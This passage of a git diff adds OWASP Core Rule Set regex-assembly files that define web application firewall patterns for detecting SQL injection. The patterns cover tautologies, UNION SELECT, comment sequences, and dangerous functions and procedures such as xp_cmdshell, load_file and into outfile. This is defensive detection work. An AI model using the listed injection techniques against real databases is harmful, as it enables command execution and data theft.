+##!> include sql-injection-mysql-postgresql-procedures-functions.ra
diff --git a/nginx/config/owasp-crs/regex-assembly/942321.ra
new file mode 100644
index 00000000..c19b5fa7
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942321.ra
@@ -0,0 +1,6 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##!> include sql-injection-mysql-postgresql-procedures-functions.ra
diff --git a/nginx/config/owasp-crs/regex-assembly/942330.ra
new file mode 100644
index 00000000..f1e2ec9d
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942330.ra
@@ -0,0 +1,51 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +[\"'`]\s*?\bor\b\s*?[\"'`]?\d +[\"'`]\s*?\bxor\b\s*?[\"'`]?\d +[\"'`]\s*?\bdiv\b\s*?[\"'`]?\d +[\"'`]\s*?\blike\b\s*?[\"'`]?\d +[\"'`]\s*?\bbetween\b\s*?[\"'`]?\d +[\"'`]\s*?\band\b\s*?[\"'`]?\d +\x5cx(?:23|27|3d) +^.?[\"'`]$ +^[\"'`\x5c]*?[\d\"'`]+\s*?\band\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bnand\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bor\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bxor\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bxxor\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bdiv\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\blike\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bbetween\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bnot\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\b\|\|\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\b\&\&\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\band\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bnand\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bor\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bxor\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bxxor\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bdiv\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\blike\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bbetween\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bnot\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\b\|\|\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\b\&\&\b\s*?[\w\"'`][+&!@(),.-] +[^\w\s]\w+\s*?[|-]\s*?[\"'`]\s*?\w +@\w+\s+and\b\s*?[\"'`\d]+ +@\w+\s+or\b\s*?[\"'`\d]+ +@\w+\s+xor\b\s*?[\"'`\d]+ +@\w+\s+div\b\s*?[\"'`\d]+ +@\w+\s+like\b\s*?[\"'`\d]+ +@\w+\s+between\b\s*?[\"'`\d]+ +@[\w-]+\sand\b\s*?[^\w\s] +@[\w-]+\sor\b\s*?[^\w\s] +@[\w-]+\sxor\b\s*?[^\w\s] 
+@[\w-]+\sdiv\b\s*?[^\w\s] +@[\w-]+\slike\b\s*?[^\w\s] +@[\w-]+\sbetween\b\s*?[^\w\s] +[^\w\s:]\s*?\d\W+[^\w\s]\s*?[\"'`]. +\Winformation_schema +table_name\W diff --git a/nginx/config/owasp-crs/regex-assembly/942340.ra b/nginx/config/owasp-crs/regex-assembly/942340.ra new file mode 100644 index 00000000..385bd844 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942340.ra @@ -0,0 +1,28 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +in\s*?\(+\s*?select +(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\s\w+]+regexp\s*?\( +(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\s\w+]+sounds\s+like\s*?[\"'`] +(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\s\w+]+[=\d]+x +[\"'`]\s*?\d\s*?-- +[\"'`]\s*?\d\s*?# +[\"'`][\%&<>^=]+\d\s*?= +[\"'`][\%&<>^=]+\d\s*?or +[\"'`][\%&<>^=]+\d\s*?xor +[\"'`][\%&<>^=]+\d\s*?div +[\"'`][\%&<>^=]+\d\s*?like +[\"'`][\%&<>^=]+\d\s*?between +[\"'`][\%&<>^=]+\d\s*?and +[\"'`]\W+[\w+-]+\s*?=\s*?\d\W+[\"'`] +[\"'`]\s*?is\s*?\d.+[\"'`]?\w +[\"'`]\|?[\w-]{3,}[^\w\s.,]+[\"'`] +[\"'`]\s*?is\s*?[\d.]+\s*?\W.*?[\"'`] +\bexcept\s+select\b +\bexcept\s+values\s*?\( +[\"'`]\s*(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)array\s*\[ +[\"'`]\s*(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\w]+\s*!?~ +[\"'`]\s*(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\w]+\s+(?:not\s+)?similar\s+to\s+ +[\"'`]\s*(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)(?:true|false)\b diff --git a/nginx/config/owasp-crs/regex-assembly/942350.ra b/nginx/config/owasp-crs/regex-assembly/942350.ra new file mode 100644 index 00000000..170fbd39 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942350.ra 
@@ -0,0 +1,30 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+create\s+function\s.+\sreturns
+
+##!> assemble
+
+ ##! matching the injection start
+ ;\s*?
+
+ ##!=>
+ alter
+ create
+ delete
+ desc
+ drop
+ insert
+ load
+ rename
+ select
+ truncate
+ update
+ ##!=>
+
+ ##! matching function/object parameters syntax
+ \b\s*?[\[(]?\w{2,}
+ ##!=>
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/942360.ra
new file mode 100644
index 00000000..62a4b6c8
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942360.ra
@@ -0,0 +1,140 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +\balter\s+char\b\s*\(? +\balter\s+group_concat\b\s*\(? +\balter\s+load_file\b\s*\(? +\bcreate\s+char\b\s*\(? +\bcreate\s+group_concat\b\s*\(? +\bcreate\s+load_file\b\s*\(? +\bdelete\s+char\b\s*\(? +\bdelete\s+group_concat\b\s*\(? +\bdelete\s+load_file\b\s*\(? +\bdesc\s+char\b\s*\(? +\bdesc\s+group_concat\b\s*\(? +\bdesc\s+load_file\b\s*\(? +\binsert\s+char\b\s*\(? +\binsert\s+group_concat\b\s*\(? +\binsert\s+load_file\b\s*\(? +\bload\s+char\b\s*\(? +\bload\s+group_concat\b\s*\(? +\bload\s+load_file\b\s*\(? +\brename\s+char\b\s*\(? +\brename\s+group_concat\b\s*\(? +\brename\s+load_file\b\s*\(? +\bselect\s+char\b\s*\(? +\bselect\s+group_concat\b\s*\(? +\bselect\s+load_file\b\s*\(? +\btruncate\s+char\b\s*\(? +\btruncate\s+group_concat\b\s*\(? +\btruncate\s+load_file\b\s*\(? +\bupdate\s+char\b\s*\(? +\bupdate\s+group_concat\b\s*\(? +\bupdate\s+load_file\b\s*\(? 
+\bend\s*?\); +[\s(]load_file\s*?\( +[\"'`]\s+regexp\W +[\"'`\w]\s+as\b\s*[\"'`\w]+\s*\bfrom +^[\W\d]+\s*?create\s+\w+ +^[\W\d]+\s*?delete\s+\w+ +^[\W\d]+\s*?desc\s+\w+ +^[\W\d]+\s*?drop\s+\w+ +^[\W\d]+\s*?insert\s+\w+ +^[\W\d]+\s*?load\s+\w+ +^[\W\d]+\s*?rename\s+\w+ +^[\W\d]+\s*?select\s+\w+ +^[\W\d]+\s*?truncate\s+\w+ +^[\W\d]+\s*?update\s+\w+ +^[\W\d]+\s*?alter\s*aggregate\b +^[\W\d]+\s*?alter\s*application\s*role\b +^[\W\d]+\s*?alter\s*assembly\b +^[\W\d]+\s*?alter\s*asymmetric\s*key\b +^[\W\d]+\s*?alter\s*audit\b +^[\W\d]+\s*?alter\s*authorization\b +^[\W\d]+\s*?alter\s*availability\s*group\b +^[\W\d]+\s*?alter\s*broker\s*priority\b +^[\W\d]+\s*?alter\s*bufferpool\b +^[\W\d]+\s*?alter\s*certificate\b +^[\W\d]+\s*?alter\s*cluster\b +^[\W\d]+\s*?alter\s*collation\b +^[\W\d]+\s*?alter\s*column\b +^[\W\d]+\s*?alter\s*conversion\b +^[\W\d]+\s*?alter\s*credential\b +^[\W\d]+\s*?alter\s*cryptographic\s*provider\b +^[\W\d]+\s*?alter\s*database\b +^[\W\d]+\s*?alter\s*default\b +^[\W\d]+\s*?alter\s*dimension\b +^[\W\d]+\s*?alter\s*diskgroup\b +^[\W\d]+\s*?alter\s*domain\b +^[\W\d]+\s*?alter\s*endpoint\b +^[\W\d]+\s*?alter\s*extension\b +^[\W\d]+\s*?alter\s*external\b +^[\W\d]+\s*?alter\s*event\b +^[\W\d]+\s*?alter\s*flashback\b +^[\W\d]+\s*?alter\s*foreign\b +^[\W\d]+\s*?alter\s*fulltext\b +^[\W\d]+\s*?alter\s*function\b +^[\W\d]+\s*?alter\s*hierarchy\b +^[\W\d]+\s*?alter\s*group\b +^[\W\d]+\s*?alter\s*histogram\b +^[\W\d]+\s*?alter\s*index\b +^[\W\d]+\s*?alter\s*indextype\b +^[\W\d]+\s*?alter\s*inmemory\b +^[\W\d]+\s*?alter\s*instance\b +^[\W\d]+\s*?alter\s*java\b +^[\W\d]+\s*?alter\s*language\b +^[\W\d]+\s*?alter\s*large\b +^[\W\d]+\s*?alter\s*library\b +^[\W\d]+\s*?alter\s*lockdown\b +^[\W\d]+\s*?alter\s*logfile\s*group\b +^[\W\d]+\s*?alter\s*login\b +^[\W\d]+\s*?alter\s*mask\b +^[\W\d]+\s*?alter\s*master\s*key\b +^[\W\d]+\s*?alter\s*materialized\b +^[\W\d]+\s*?alter\s*message\s*type\b +^[\W\d]+\s*?alter\s*method\b +^[\W\d]+\s*?alter\s*module\b 
+^[\W\d]+\s*?alter\s*nickname\b +^[\W\d]+\s*?alter\s*operator\b +^[\W\d]+\s*?alter\s*outline\b +^[\W\d]+\s*?alter\s*package\b +^[\W\d]+\s*?alter\s*partition\b +^[\W\d]+\s*?alter\s*permission\b +^[\W\d]+\s*?alter\s*procedure\b +^[\W\d]+\s*?alter\s*profile\b +^[\W\d]+\s*?alter\s*queue\b +^[\W\d]+\s*?alter\s*remote\b +^[\W\d]+\s*?alter\s*resource\b +^[\W\d]+\s*?alter\s*role\b +^[\W\d]+\s*?alter\s*rollback\b +^[\W\d]+\s*?alter\s*route\b +^[\W\d]+\s*?alter\s*schema\b +^[\W\d]+\s*?alter\s*search\b +^[\W\d]+\s*?alter\s*security\b +^[\W\d]+\s*?alter\s*server\b +^[\W\d]+\s*?alter\s*service\b +^[\W\d]+\s*?alter\s*sequence\b +^[\W\d]+\s*?alter\s*session\b +^[\W\d]+\s*?alter\s*symmetric\s*key\b +^[\W\d]+\s*?alter\s*synonym\b +^[\W\d]+\s*?alter\s*stogroup\b +^[\W\d]+\s*?alter\s*table\b +^[\W\d]+\s*?alter\s*tablespace\b +^[\W\d]+\s*?alter\s*text\b +^[\W\d]+\s*?alter\s*threshold\b +^[\W\d]+\s*?alter\s*trigger\b +^[\W\d]+\s*?alter\s*trusted\b +^[\W\d]+\s*?alter\s*type\b +^[\W\d]+\s*?alter\s*usage\b +^[\W\d]+\s*?alter\s*user\b +^[\W\d]+\s*?alter\s*view\b +^[\W\d]+\s*?alter\s*work\b +^[\W\d]+\s*?alter\s*workload\b +^[\W\d]+\s*?alter\s*wrapper\b +^[\W\d]+\s*?alter\s*xml\s*schema\b +^[\W\d]+\s*?alter\s*xsrobject\b +^[\W\d]+\s*?union\s*all\b +^[\W\d]+\s*?union\s*select\b +^[\W\d]+\s*?union\s*distinct\b diff --git a/nginx/config/owasp-crs/regex-assembly/942362.ra b/nginx/config/owasp-crs/regex-assembly/942362.ra new file mode 100644 index 00000000..f0461e33 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942362.ra 
@@ -0,0 +1,171 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##! Helpers
+
+##!> define nonword_number ^[\W\d]+\s*?
+
+##!> define cmd_alter alter
+##!> define cmd_create create
+##!> define cmd_delete delete
+##!> define cmd_desc desc
+##!> define cmd_insert insert
+##!> define cmd_load load
+##!> define cmd_rename rename
+##!> define cmd_select select
+##!> define cmd_truncate truncate
+##!> define cmd_update update
+##!> define cmd_drop drop
+##!> define cmd_union union
+
+##!> define seq_char \s+char\s?\(?
+##!> define seq_group_concat \s+group_concat\s?\(?
+##!> define seq_load_file \s+load_file\s?\(?
+
+##! Main assembly
+##!> assemble
+ ##!> assemble
+ {{cmd_alter}}
+ {{cmd_create}}
+ {{cmd_delete}}
+ {{cmd_desc}}
+ {{cmd_insert}}
+ {{cmd_load}}
+ {{cmd_rename}}
+ {{cmd_select}}
+ {{cmd_truncate}}
+ {{cmd_update}}
+ ##!=>
+ {{seq_char}}
+ {{seq_group_concat}}
+ {{seq_load_file}}
+ ##!<
+
+ end\s*?\);
+ [\s(]load_file\s*?\(
+ [\"'`]\s+regexp\W
+ [\d\W]\s+as\b\s*[\"'`\w]+\s*\bfrom
+
+ ##!> assemble
+ {{nonword_number}}
+ ##!=>
+ {{cmd_create}}\s+\w+
+ {{cmd_delete}}\b
+ {{cmd_desc}}\b
+ {{cmd_drop}}\b
+ {{cmd_insert}}\b
+ {{cmd_load}}\b
+ {{cmd_rename}}\b
+ {{cmd_select}}\b
+ {{cmd_truncate}}\b
+ {{cmd_update}}\b
+ ##!> assemble
+ {{cmd_alter}}\s*
+ ##!=>
+ aggregate
+ application\s*role
+ assembly
+ asymmetric\s*key
+ audit
+ authorization
+ availability\s*group
+ broker\s*priority
+ bufferpool
+ certificate
+ cluster
+ collation
+ column
+ conversion
+ credential
+ cryptographic\s*provider
+ database
+ default
+ dimension
+ diskgroup
+ domain
+ endpoint
+ extension
+ external
+ event
+ flashback
+ foreign
+ fulltext
+ function
+ hierarchy
+ group
+ histogram
+ index
+ indextype
+ inmemory
+ instance
+ java
+ language
+ large
+ library
+ lockdown
+ logfile\s*group
+ login
+ mask
+ master\s*key
+ materialized
+ message\s*type
+ method
+ module
+ nickname
+ operator
+ outline
+ package
+ partition
+ permission
+ procedure
+ profile
+ queue
+ remote
+ resource
+ role
+ rollback
+ route
+ schema
+ search
+ security
+ server
+ service
+ sequence
+ session
+ symmetric\s*key
+ synonym
+ stogroup
+ table
+ tablespace
+ text
+ threshold
+ trigger
+ trusted
+ type
+ usage
+ user
+ view
+ work
+ workload
+ wrapper
+ xml\s*schema
+ xsrobject
+ ##!=>
+ \b
+ ##!=>
+ ##!<
+
+ ##!> assemble
+ {{cmd_union}}\s*
+ ##!=>
+ all
+ select
+ distinct
+ ##!=>
+ \b
+ ##!=>
+ ##!<
+ ##!<
+##!<
diff --git a/nginx/config/owasp-crs/regex-assembly/942370.ra b/nginx/config/owasp-crs/regex-assembly/942370.ra
new file mode 100644
index 00000000..e8253dc4
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942370.ra
@@ -0,0 +1,51 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+##! Helpers
+##!> define quotes [\"'`]
+
+##!> assemble
+ or
+ xor
+ div
+ like
+ between
+ and
+ ##!=< operators
+##!<
+
+##! Main assembly
+##!> assemble
+ {{quotes}}\s*?
+ ##!=>
+ ##!> assemble
+ \*.+
+ ##!=>
+ ##!> assemble
+ ##!> assemble
+ ##!=> operators
+ ##!<
+ id
+ ##!=>
+ ##!<
+ ##!=>
+ \W*?{{quotes}}\d
+ ##!=>
+ ##!<
+ [^\w\s?]+\s*?[^\w\s]+\s*?{{quotes}}
+ [^\w\s]+\s*?[\W\d].*?#
+ [^\w\s]+\s*?[\W\d].*?--
+ ##!> assemble
+ ##!> assemble
+ ##!=> operators
+ ##!<
+ ##!=>
+ \s[^\d]+[\w-]+.*?\d
+ ##!<
+##!<
+
+\^{{quotes}}
+{{quotes}}.*?\*\s*?\d
+[()\*<>%+-][\w-]+[^\w\s]+{{quotes}}[^,]
diff --git a/nginx/config/owasp-crs/regex-assembly/942380.ra b/nginx/config/owasp-crs/regex-assembly/942380.ra
new file mode 100644
index 00000000..7c435bce
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942380.ra
@@ -0,0 +1,25 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+\bhaving\b\s+\d{1,10}\s*?[=<>]
+\bhaving\b\s+'[^=]{1,10}'\s*?[=<>]
+\bexecute\(
+\bexecute\s{1,5}[\w\.$]{1,5}\s{0,3}
+\bhaving\b ?\d{1,10} ?[=<>]+
+\bhaving\b ?[\'\"][^=]{1,10}[\'\" ?[=<>]+
+\bcreate\s+?table.{0,20}?\(
+\blike\W*?char\W*?\(
+select.*?case
+from.*?limit
+order\sby
+exists\s\sselect
+exists\sselect\Sif\s\(
+exists\sselect\Sifnull\s\(
+exists\sselect\Stop
+exists\sselect\Sconcat
+exists\ssystem\s\(
+exists\s\bhaving\b\s+\d{1,10}
+exists\s'[^=]{1,10}'
+\bexists\s*?\(\s*?select\b
diff --git a/nginx/config/owasp-crs/regex-assembly/942390.ra b/nginx/config/owasp-crs/regex-assembly/942390.ra
new file mode 100644
index 00000000..b13dab49
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942390.ra
@@ -0,0 +1,17 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+\bor\b\s?\d{1,10}\s?[=<>]+
+\bor\b\s?[\'\"][^=]{1,10}[\'\"]\s?[=<>]+
+'\s+or\s+.{1,20}[+\-!<>=]
+'\s+xor\s+.{1,20}[+\-!<>=]
+\bor\b\s+\d{1,10}
+\bor\b\s+'[^=]{1,10}'
+\bxor\b\s+\d{1,10}
+\bxor\b\s+'[^=]{1,10}'
+\bor\b\s+\d{1,10}\s*?[=<>]
+\bxor\b\s+\d{1,10}\s*?[=<>]
+\bor\b\s+'[^=]{1,10}'\s*?[=<>]
+\bxor\b\s+'[^=]{1,10}'\s*?[=<>]
diff --git a/nginx/config/owasp-crs/regex-assembly/942400.ra b/nginx/config/owasp-crs/regex-assembly/942400.ra
new file mode 100644
index 00000000..6852bcf8
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942400.ra
@@ -0,0 +1,9 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+\band\b\s+\d{1,10}\s*?[=<>]
+\band\b\s+'[^=]{1,10}'
+\band\b ?\d{1,10} ?[=<>]+
+\band\b ?[\'\"][^=]{1,10}[\'\"] ?[=<>]+
diff --git a/nginx/config/owasp-crs/regex-assembly/942410.ra b/nginx/config/owasp-crs/regex-assembly/942410.ra
new file mode 100644
index 00000000..751d6252
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942410.ra 
@@ -0,0 +1,246 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+##!^ \b
+##!$ \W*?\(
+
+abs
+acos
+adddate
+addtime
+aes_decrypt
+aes_encrypt
+asin
+ascii
+asciistr
+atan
+atan2
+avg
+benchmark
+bin
+bin_to_num
+bit_and
+bit_count
+bit_length
+bit_or
+bit_xor
+cast
+char
+character_length
+char_length
+charset
+chr
+ciel
+cieling
+coalesce
+coercibility
+compress
+concat
+concat_ws
+connection_id
+conv
+convert
+convert_tz
+cos
+cot
+count
+cr32
+curdate
+current_date
+current_time
+current_timestamp
+current_user
+curtime
+database
+date
+date_add
+datediff
+date_format
+date_sub
+day
+dayname
+dayofmonth
+dayofweek
+dayofyear
+dcount
+decode
+default
+degrees
+des_decrypt
+des_encrypt
+dump
+elt
+encode
+encrypt
+exp
+export_set
+extract
+extractvalue
+field
+field_in_set
+find_in_set
+floor
+format
+found_rows
+from_base64
+from_days
+from_unixtime
+get_format
+get_lock
+greatest
+group_concat
+hex
+hextoraw
+hour
+if
+ifnull
+in
+inet6_aton
+inet6_ntoa
+inet_aton
+inet_ntoa
+insert
+instr
+interval
+is
+is_free_lock
+is_ipv4
+is_ipv4_compat
+is_ipv4_mapped
+is_ipv6
+is_not
+is_not_null
+isnull
+is_null
+is_used_lock
+last
+last_day
+last_insert_id
+lcase
+least
+left
+length
+ln
+load_file
+local
+localtimestamp
+locate
+log
+log10
+log2
+lower
+lpad
+ltrim
+makedate
+make_set
+master_pos_wait
+max
+md5
+microsecond
+mid
+min
+minute
+mod
+month
+monthname
+name_const
+not_in
+now
+nullif
+oct
+octet_length
+old_password
+ord
+password
+period_add
+period_diff
+pg_sleep
+pi
+position
+pow
+power
+procedure_analyse
+quarter
+quote
+radians
+rand
+rawtohex
+rawtonhex
+rawtonhextoraw
+release_lock
+repeat
+replace
+reverse
+right
+round
+row_count
+rpad
+rtrim
+schema
+second
+sec_to_time
+session_user
+sha
+sha1
+sha2
+sign
+sin
+sleep
+soundex
+space
+sqrt
+std
+stddev
+stddev_pop
+stddev_samp
+strcmp
+str_to_date
+subdate
+substr
+substring
+substring_index
+subtime
+sum
+sysdate
+system_user
+tan
+time
+timediff
+time_format
+timestamp
+timestampadd
+timestampdiff
+time_to_sec
+to_base64
+to_char
+to_days
+to_nchar
+to_seconds
+trim
+truncate
+ucase
+uncompress
+uncompressed_length
+unhex
+unix_timestamp
+updatexml
+upper
+user
+utc_date
+utc_time
+utc_timestamp
+uuid
+uuid_short
+values
+variance
+var_pop
+var_samp
+version
+week
+weekday
+weekofyear
+weight_string
+xmltype
+year
+yearweek
diff --git a/nginx/config/owasp-crs/regex-assembly/942440-chain1.ra b/nginx/config/owasp-crs/regex-assembly/942440-chain1.ra
new file mode 100644
index 00000000..1592b5b1
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942440-chain1.ra
@@ -0,0 +1,25 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This chained rule is used to match on JWT base64-urlencoded tokens.
+##! See https://www.rfc-editor.org/rfc/rfc4648#section-5 for details.
+
+##! JWTs consist of base64-urlencoded encoded JSON, and a JSON structure
+##! just starts with '{"', which becomes 'ey' when encoded with a base64-urlencoded encoder.
+
+##!> define base64-urlencoded-charset [a-zA-Z0-9_-]+
+##!> define dot [.]
+
+##!^ ^ey
+
+{{base64-urlencoded-charset}}
+
+##!=>
+
+{{dot}}ey{{base64-urlencoded-charset}}
+
+##!=>
+
+{{dot}}{{base64-urlencoded-charset}}
+
+##!$ $
diff --git a/nginx/config/owasp-crs/regex-assembly/942440.ra b/nginx/config/owasp-crs/regex-assembly/942440.ra
new file mode 100644
index 00000000..4d790510
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942440.ra
@@ -0,0 +1,10 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+/\*!?
+\*/
+[';]--
+--\s
+--[^-]*?-
+[^&-]#.*?\s
+;?\x00
diff --git a/nginx/config/owasp-crs/regex-assembly/942470.ra b/nginx/config/owasp-crs/regex-assembly/942470.ra
new file mode 100644
index 00000000..e9f5f3b5
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942470.ra
@@ -0,0 +1,51 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+autonomous_transaction
+current_user
+dba_users
+dbms_java
+nvarchar
+openowa_util
+openquery
+openrowset
+sp_addextendedproc
+sp_execute
+sp_executesql
+sp_help
+sp_is_srvrolemember
+sp_makewebtask
+sp_oacreate
+sp_password
+sp_prepare
+sp_replwritetovarbin
+sp_sqlexec
+sql_longvarchar
+sql_variant
+tbcreator
+utl_file
+utl_http
+varchar
+xp_availablemedia
+xp_cmdshell
+xp_dirtree
+xp_enumdsn
+xp_execresultset
+xp_filelist
+xp_loginconfig
+xp_makecab
+xp_ntsec
+xp_ntsec_enumdomains
+xp_regaddmultistring
+xp_regdeletekey
+xp_regdeletevalue
+xp_regenumkeys
+xp_regenumvalues
+xp_regread
+xp_regremovemultistring
+xp_regwrite
+xp_servicecontrol
+xp_terminate
+xp_terminate_process
diff --git a/nginx/config/owasp-crs/regex-assembly/942480.ra b/nginx/config/owasp-crs/regex-assembly/942480.ra
new file mode 100644
index 00000000..77655c6e
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942480.ra
@@ -0,0 +1,35 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+\bdbms_\w+\.\b
+\bdelete\b\W*?\bfrom\b
+\bgroup\b.*?\bby\b.{1,100}?\bhaving\b
+\binner\b\W*?\bjoin\b
+\binsert\b\W*?\binto\b
+\binto\b\W*?\bdumpfile\b
+\binto\b\W*?\boutfile\b
+\bload\b\W*?\bdata\b.*?\binfile\b
+\boverlay\b\W*?\(.*?\b\W*?placing\b
+\bprint\b\W*?\@\@
+\bselect\b.{1,100}?\b.*?\bdump\b.*\bfrom\b
+\bselect\b.{1,100}?\bcount\b.{1,100}?\bfrom\b
+\bselect\b.{1,100}?\bdata_type\b
+\bselect\b.{1,100}?\bfrom\b.{1,100}?\bwhere\b
+\bselect\b.{1,100}?\binstr\b
+\bselect\b.{1,100}?\blength\b.{1,100}?\bfrom\b
+\bselect\b.{1,100}?\bto_char\b
+\bselect\b.{1,100}?\bto_number\b
+\bselect\b.{1,100}?\btop\b.{1,100}?\bfrom\b
+\bsys_context\b
+\bunion\b.{1,100}?\bselect\b
+\butl_inaddr\b
+collation\W*?\(a\b
+'dbo'
+'msdasql'
+'sa'
+'sqloledb'
+\@\@version\b
+;\W*?\bdrop\b
+;\W*?\bshutdown\b
diff --git a/nginx/config/owasp-crs/regex-assembly/942520.ra b/nginx/config/owasp-crs/regex-assembly/942520.ra
new file mode 100644
index 00000000..05ae95b3
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942520.ra
@@ -0,0 +1,18 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!+ i
+
+
+##!^ [\"'`]\s*?
+
+##! All tests below are prefixed with [\"'`]\s*?
+
+is\s+not\b
+##! all sqlite not smth from https://www.sqlite.org/lang_expr.html
+not\s+(?:like|glob|between|null|in|regexp|match)\b
+##! sql operators
+[|&<>*\/%=^+-]
+##! common operators that can't be added to 942120.data
+(?:mod|div)\b
+sounds\s+like\b
diff --git a/nginx/config/owasp-crs/regex-assembly/942521.ra b/nginx/config/owasp-crs/regex-assembly/942521.ra
new file mode 100644
index 00000000..de2ab196
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942521.ra
@@ -0,0 +1,10 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!^ ^
+##!+ i
+
+##! Regex for detecting first word after an odd number of quotes
+[^']*?(?:'[^']*?'[^']*?)*?'\s*(\w+)\b
+[^\"]*?(?:\"[^\"]*?\"[^\"]*?)*?\"\s*(\w+)\b
+[^`]*?(?:`[^`]*?`[^`]*?)*?`\s*(\w+)\b
diff --git a/nginx/config/owasp-crs/regex-assembly/942540.ra b/nginx/config/owasp-crs/regex-assembly/942540.ra
new file mode 100644
index 00000000..248fdfcc
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942540.ra
@@ -0,0 +1,8 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! These expressions look for an ending '; pattern, but won't match if the quotes
+##! are balanced.
+^[^']*'\s*;
+^[^"]*"\s*;
+^[^`]*`\s*;
diff --git a/nginx/config/owasp-crs/regex-assembly/942550.ra b/nginx/config/owasp-crs/regex-assembly/942550.ra
new file mode 100644
index 00000000..bf65e63c
--- /dev/null
+++ b/nginx/config/owasp-crs/regex-assembly/942550.ra
@@ -0,0 +1,30 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Referring to https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf
